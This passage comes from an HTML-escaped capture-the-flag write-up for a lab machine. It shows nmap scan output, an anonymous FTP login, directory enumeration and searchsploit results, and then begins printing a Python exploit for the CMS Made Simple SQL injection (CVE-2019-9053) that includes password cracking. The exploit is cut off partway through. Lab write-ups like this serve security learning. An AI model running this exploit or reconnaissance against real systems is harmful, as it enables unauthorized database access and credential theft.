&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| http-methods:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>|_ Supported Methods: GET HEAD POST OPTIONS
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| http-robots.txt: &lt;span style="color:#d3869b">2&lt;/span> disallowed entries
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>|_/ /openemr-5_0_1_3
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>|_http-server-header: Apache/2.4.18 &lt;span style="color:#fe8019">(&lt;/span>Ubuntu&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>|_http-title: Apache2 Ubuntu Default Page: It works
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>2222/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 &lt;span style="color:#fe8019">(&lt;/span>Ubuntu Linux; protocol 2.0&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| ssh-hostkey:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| &lt;span style="color:#d3869b">2048&lt;/span> 29:42:69:14:9e:ca:d9:17:98:8c:27:72:3a:cd:a9:23 &lt;span style="color:#fe8019">(&lt;/span>RSA&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCj5RwZ5K4QU12jUD81IxGPdEmWFigjRwFNM2pVBCiIPWiMb+R82pdw5dQPFY0JjjicSysFN3pl8ea2L8acocd/7zWke6ce50tpHaDs8OdBYLfpkh+OzAsDwVWSslgKQ7rbi/ck1FF1LIgY7UQdo5FWiTMap7vFnsT/WHL3HcG5Q+el4glnO4xfMMvbRar5WZd4N0ZmcwORyXrEKvulWTOBLcoMGui95Xy7XKCkvpS9RCpJgsuNZ/oau9cdRs0gDoDLTW4S7OI9Nl5obm433k+7YwFeoLnuZnCzegEhgq/bpMo+fXTb/4ILI5bJHJQItH2Ae26iMhJjlFsMqQw0FzLf
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| &lt;span style="color:#d3869b">256&lt;/span> 9b:d1:65:07:51:08:00:61:98:de:95:ed:3a:e3:81:1c &lt;span style="color:#fe8019">(&lt;/span>ECDSA&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBM6Q8K/lDR5QuGRzgfrQSDPYBEBcJ+/2YolisuiGuNIF+1FPOweJy9esTtstZkG3LPhwRDggCp4BP+Gmc92I3eY&lt;span style="color:#fe8019">=&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| &lt;span style="color:#d3869b">256&lt;/span> 12:65:1b:61:cf:4d:e5:75:fe:f4:e8:d4:6e:10:2a:f6 &lt;span style="color:#fe8019">(&lt;/span>ED25519&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ2I73yryK/Q6UFyvBBMUJEfznlIdBXfnrEqQ3lWdymK
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Read data files from: /usr/bin/../share/nmap
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># Nmap done at Sat Jan 14 10:30:15 2023 -- 1 IP address (1 host up) scanned in 43.25 seconds&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>3 TCP ports are open:&lt;/p>
&lt;ul>
&lt;li>&lt;strong>21/tcp -&amp;gt;&lt;/strong> &lt;code>FTP&lt;/code>&lt;/li>
&lt;li>&lt;strong>80/tcp -&amp;gt;&lt;/strong> &lt;code>HTTP&lt;/code>&lt;/li>
&lt;li>&lt;strong>2222/tcp -&amp;gt;&lt;/strong> &lt;code>SSH&lt;/code>&lt;/li>
&lt;/ul>
&lt;hr>
&lt;h2 id="port-21---ftp-vsftpd-303">Port 21 - FTP (vsFTPd 3.0.3)&lt;/h2>
&lt;p>FTP Anonymous login is enabled and we can login using either &lt;code>ftp&lt;/code> or &lt;code>anonymous&lt;/code> user without any password. Inside the server there was a directory named &lt;code>pub&lt;/code> and inside that a file, &lt;code>ForMitch.txt&lt;/code>.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span> ftp ftp@10.10.38.40
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Connected to 10.10.38.40.
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#d3869b">220&lt;/span> &lt;span style="color:#fe8019">(&lt;/span>vsFTPd 3.0.3&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#d3869b">230&lt;/span> Login successful.
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Remote system &lt;span style="color:#fabd2f">type&lt;/span> is UNIX.
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Using binary mode to transfer files.
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>ftp&amp;gt; ls
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>drwxr-xr-x &lt;span style="color:#d3869b">2&lt;/span> ftp ftp &lt;span style="color:#d3869b">4096&lt;/span> Aug &lt;span style="color:#d3869b">17&lt;/span> &lt;span style="color:#d3869b">2019&lt;/span> pub
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>ftp&amp;gt; &lt;span style="color:#fabd2f">cd&lt;/span> pub
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>ftp&amp;gt; ls
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>-rw-r--r-- &lt;span style="color:#d3869b">1&lt;/span> ftp ftp &lt;span style="color:#d3869b">166&lt;/span> Aug &lt;span style="color:#d3869b">17&lt;/span> &lt;span style="color:#d3869b">2019&lt;/span> ForMitch.txt
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>ftp&amp;gt; get ForMitch.txt
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>100% |*************************************************| &lt;span style="color:#d3869b">166&lt;/span> 3.51 MiB/s 00:00 ETA
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#d3869b">166&lt;/span> bytes received in 00:00 &lt;span style="color:#fe8019">(&lt;/span>0.79 KiB/s&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>ftp&amp;gt;
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;br/>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-fallback" data-lang="fallback">&lt;span style="display:flex;">&lt;span> cat ForMitch.txt
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Dammit man... you&amp;#39;te the worst dev i&amp;#39;ve seen. You set the same passfor the system user,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>and the password is so weak... i cracked it in seconds. Gosh... what a mess!
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;h2 id="port-80---http-apache-2418-ubuntu-default">Port 80 - HTTP (Apache 2.4.18 Ubuntu default)&lt;/h2>
&lt;p>This is just the default page of apache.&lt;/p>
&lt;img src="https://h4r1337.github.io/img/simple-ctf/apache-default.webp" alt="Apache Ubuntu default" style="ZgotmplZ">
&lt;p>Interestingly there&amp;rsquo;s a &lt;code>robots.txt&lt;/code> file inside
the server.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-fallback" data-lang="fallback">&lt;span style="display:flex;">&lt;span>User-agent: *
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Disallow: /
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Disallow: /openemr-5_0_1_3
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>But &lt;code>/openemr-5_0_1_2&lt;/code> is a rabbit hole. So let&amp;rsquo;s move on.&lt;/p>
&lt;img src="https://h4r1337.github.io/img/simple-ctf/not-found.webp" alt="Not found" style="ZgotmplZ">
&lt;h2 id="directory-listing-dirsearch---commontxt">Directory Listing (dirsearch - common.txt)&lt;/h2>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span> dirsearch -u http://10.10.38.40/ --wordlist /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -o directory-listing
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> _|. _ _ _ _ _ _|_ v0.4.2.7
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">(&lt;/span>_&lt;span style="color:#fe8019">||&lt;/span>| _&lt;span style="color:#fe8019">)&lt;/span> &lt;span style="color:#fe8019">(&lt;/span>/_&lt;span style="color:#fe8019">(&lt;/span>_&lt;span style="color:#fe8019">||&lt;/span> &lt;span style="color:#fe8019">(&lt;/span>_| &lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: &lt;span style="color:#d3869b">25&lt;/span> | Wordlist size: &lt;span style="color:#d3869b">4712&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Output File: /home/h4r1337/ctf/thm/simple-ctf/reports/http_10.10.38.40/__23-01-14_11-02-37.txt
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Target: http://10.10.38.40/
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">[&lt;/span>11:02:37&lt;span style="color:#fe8019">]&lt;/span> Starting:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">[&lt;/span>11:03:35&lt;span style="color:#fe8019">]&lt;/span> &lt;span style="color:#d3869b">200&lt;/span> - 929B - /robots.txt
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">[&lt;/span>11:03:37&lt;span style="color:#fe8019">]&lt;/span> &lt;span style="color:#d3869b">403&lt;/span> - 299B - /server-status
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">[&lt;/span>11:03:38&lt;span style="color:#fe8019">]&lt;/span> &lt;span style="color:#d3869b">301&lt;/span> - 311B - /simple -&amp;gt; http://10.10.38.40/simple/
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Task Completed
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;h2 id="simple---cms-made-simple-version-228">&lt;code>/simple/&lt;/code> - CMS Made Simple (Version 2.2.8)&lt;/h2>
&lt;p>There&amp;rsquo;s a &lt;strong>cms&lt;/strong> running inside the &lt;code>/simple/&lt;/code> directory.&lt;/p>
&lt;img src="https://h4r1337.github.io/img/simple-ctf/cms-made-simple.webp" alt="CMS Made Simple" style="ZgotmplZ">
&lt;p>Searchsploit Output:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span> searchsploit cms made simple 2.2.8
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>------------------------------------------------------------ ---------------------------------
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> Exploit Title | Path
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>------------------------------------------------------------ ---------------------------------
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>CMS Made Simple &amp;lt; 2.2.10 - SQL Injection | php/webapps/46635.py
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>------------------------------------------------------------ ---------------------------------
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Shellcodes: No Results
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> searchsploit -m 46635.py
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Alright we got an exploit. We can save a copy of it on the current working directory
using the &lt;code>-m&lt;/code> flag of &lt;code>searchsploit&lt;/code>. We will check it out later.&lt;/p>
&lt;h2 id="port-2222-ssh---openssh-72p2">Port 2222 SSH - (OpenSSH 7.2p2)&lt;/h2>
&lt;ul>
&lt;li>Searchsploit Results:&lt;/li>
&lt;/ul>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span> searchsploit openssh 7.2p2
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>------------------------------------------------------------- ---------------------------------
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> Exploit Title | Path
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>------------------------------------------------------------- ---------------------------------
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>OpenSSH 2.3 &amp;lt; 7.7 - Username Enumeration | linux/remote/45233.py
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>OpenSSH 2.3 &amp;lt; 7.7 - Username Enumeration &lt;span style="color:#fe8019">(&lt;/span>PoC&lt;span style="color:#fe8019">)&lt;/span> | linux/remote/45210.py
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">&amp;#39;OpenSSH 7.2p2 - Username Enumeration | linux/remote/40136.py&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>OpenSSH &amp;lt; 7.4 - UsePrivilegeSeparation Disabled Forwarded | linux/local/40962.txt
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>OpenSSH &amp;lt; 7.4 - agent Protocol Arbitrary Library Loading | linux/remote/40963.txt
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>OpenSSH &amp;lt; 7.7 - User Enumeration &lt;span style="color:#fe8019">(&lt;/span>2&lt;span style="color:#fe8019">)&lt;/span> | linux/remote/45939.py
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">&amp;#39;OpenSSHd 7.2p2 - Username Enumeration | linux/remote/40113.txt&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>------------------------------------------------------------- ---------------------------------
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Shellcodes: No Results
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Nothing interesting in here. Username probably is &lt;code>mitch&lt;/code> from the &lt;code>ForMitch.txt&lt;/code> file.
So we don&amp;rsquo;t have to use these exploits.&lt;/p>
&lt;hr>
&lt;h1 id="exploitation">Exploitation&lt;/h1>
&lt;h2 id="unauthenticated-sql-injection--cve-2019-9053-cms-made-simple">Unauthenticated SQL Injection ( CVE-2019-9053 CMS Made Simple)&lt;/h2>
&lt;blockquote>
&lt;p>An issue was discovered in CMS Made Simple 2.2.8. It is possible with the News module, through a crafted URL, to achieve unauthenticated blind time-based SQL injection via the &lt;code>m1_idlist&lt;/code> parameter.&lt;/p>
&lt;/blockquote>
&lt;p>Exploit used (modified a bit to support python3):
You can download the original from &lt;a href="https://www.exploit-db.com/exploits/46635">here&lt;/a>&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-python" data-lang="python">&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic">#!/usr/bin/python3&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># Exploit Title: Unauthenticated SQL Injection on CMS Made Simple &amp;lt;= 2.2.9&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># Date: 30-03-2019&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># Exploit Author: Daniele Scanu @ Certimeter Group&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># Vendor Homepage: https://www.cmsmadesimple.org/&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># Software Link: https://www.cmsmadesimple.org/downloads/cmsms/&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># Version: &amp;lt;= 2.2.9&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># Tested on: Ubuntu 18.04 LTS&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># CVE : CVE-2019-9053&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">import&lt;/span> requests
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">import&lt;/span> time
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">import&lt;/span> optparse
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">import&lt;/span> hashlib
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>parser &lt;span style="color:#fe8019">=&lt;/span> optparse&lt;span style="color:#fe8019">.&lt;/span>OptionParser()
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>parser&lt;span style="color:#fe8019">.&lt;/span>add_option(&lt;span style="color:#b8bb26">&amp;#39;-u&amp;#39;&lt;/span>, &lt;span style="color:#b8bb26">&amp;#39;--url&amp;#39;&lt;/span>, action&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;store&amp;#34;&lt;/span>, dest&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;url&amp;#34;&lt;/span>, help&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;Base target uri (ex. http://10.10.10.100/cms)&amp;#34;&lt;/span>)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>parser&lt;span style="color:#fe8019">.&lt;/span>add_option(&lt;span style="color:#b8bb26">&amp;#39;-w&amp;#39;&lt;/span>, &lt;span style="color:#b8bb26">&amp;#39;--wordlist&amp;#39;&lt;/span>, action&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;store&amp;#34;&lt;/span>, dest&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;wordlist&amp;#34;&lt;/span>, help&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;Wordlist for crack admin password&amp;#34;&lt;/span>)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>parser&lt;span style="color:#fe8019">.&lt;/span>add_option(&lt;span style="color:#b8bb26">&amp;#39;-c&amp;#39;&lt;/span>, &lt;span style="color:#b8bb26">&amp;#39;--crack&amp;#39;&lt;/span>, action&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;store_true&amp;#34;&lt;/span>, dest&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;cracking&amp;#34;&lt;/span>, help&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;Crack password with wordlist&amp;#34;&lt;/span>, default&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#fe8019">False&lt;/span>)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>options, args &lt;span style="color:#fe8019">=&lt;/span> parser&lt;span style="color:#fe8019">.&lt;/span>parse_args()
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">if&lt;/span> &lt;span style="color:#fe8019">not&lt;/span> options&lt;span style="color:#fe8019">.&lt;/span>url:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">print&lt;/span>(&lt;span style="color:#b8bb26">&amp;#34;[+] Specify an url target&amp;#34;&lt;/span>)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">print&lt;/span>(&lt;span style="color:#b8bb26">&amp;#34;[+] Example usage (no cracking password): exploit.py -u http://target-uri&amp;#34;&lt;/span>)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">print&lt;/span>(&lt;span style="color:#b8bb26">&amp;#34;[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist&amp;#34;&lt;/span>)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">print&lt;/span>(&lt;span style="color:#b8bb26">&amp;#34;[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based.&amp;#34;&lt;/span>)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> exit()
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>url_vuln &lt;span style="color:#fe8019">=&lt;/span> options&lt;span style="color:#fe8019">.&lt;/span>url &lt;span style="color:#fe8019">+&lt;/span> &lt;span style="color:#b8bb26">&amp;#39;/moduleinterface.php?mact=News,m1_,default,0&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>session &lt;span style="color:#fe8019">=&lt;/span> requests&lt;span style="color:#fe8019">.&lt;/span>Session()
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>dictionary &lt;span style="color:#fe8019">=&lt;/span> &lt;span style="color:#b8bb26">&amp;#39;1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM@._-$&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>flag &lt;span style="color:#fe8019">=&lt;/span> &lt;span style="color:#fe8019">True&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>password &lt;span style="color:#fe8019">=&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>temp_password &lt;span style="color:#fe8019">=&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>TIME &lt;span style="color:#fe8019">=&lt;/span> &lt;span style="color:#d3869b">1&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>db_name &lt;span style="color:#fe8019">=&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>output &lt;span style="color:#fe8019">=&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>email &lt;span style="color:#fe8019">=&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>salt &lt;span style="color:#fe8019">=&lt;/span> &lt;span style="color:#b8bb26">&amp;#39;&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>wordlist &lt;span style="color:#fe8019">=&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">if&lt;/span> options&lt;span style="color:#fe8019">.&lt;/span>wordlist:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> wordlist &lt;span style="color:#fe8019">+=&lt;/span> options&lt;span style="color:#fe8019">.&lt;/span>wordlist
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">def&lt;/span> &lt;span style="color:#fabd2f">crack_password&lt;/span>():
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">global&lt;/span> password
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">global&lt;/span> output
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">global&lt;/span> wordlist
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">global&lt;/span> salt
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">dict&lt;/span> &lt;span style="color:#fe8019">=&lt;/span> &lt;span style="color:#fabd2f">open&lt;/span>(wordlist)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">for&lt;/span> line &lt;span style="color:#fe8019">in&lt;/span> &lt;span style="color:#fabd2f">dict&lt;/span>&lt;span style="color:#fe8019">.&lt;/span>readlines():
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> line &lt;span style="color:#fe8019">=&lt;/span> line&lt;span style="color:#fe8019">.&lt;/span>replace(&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>&lt;span style="color:#b8bb26">\n&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>, &lt;span style="color:#b8bb26">&amp;#34;&amp;#34;&lt;/span>)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> beautify_print_try(line)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">if&lt;/span> hashlib&lt;span style="color:#fe8019">.&lt;/span>md5(&lt;span style="color:#fabd2f">str&lt;/span>(salt) &lt;span style="color:#fe8019">+&lt;/span> line)&lt;span style="color:#fe8019">.&lt;/span>hexdigest() &lt;span style="color:#fe8019">==&lt;/span> password:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> output &lt;span style="color:#fe8019">+=&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;&lt;/span>&lt;span style="color:#b8bb26">\n&lt;/span>&lt;span style="color:#b8bb26">[+] Password cracked: &amp;#34;&lt;/span> &lt;span style="color:#fe8019">+&lt;/span> line
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">break&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">dict&lt;/span>&lt;span style="color:#fe8019">.&lt;/span>close()
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">def&lt;/span> &lt;span style="color:#fabd2f">beautify_print_try&lt;/span>(value):
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">global&lt;/span> output
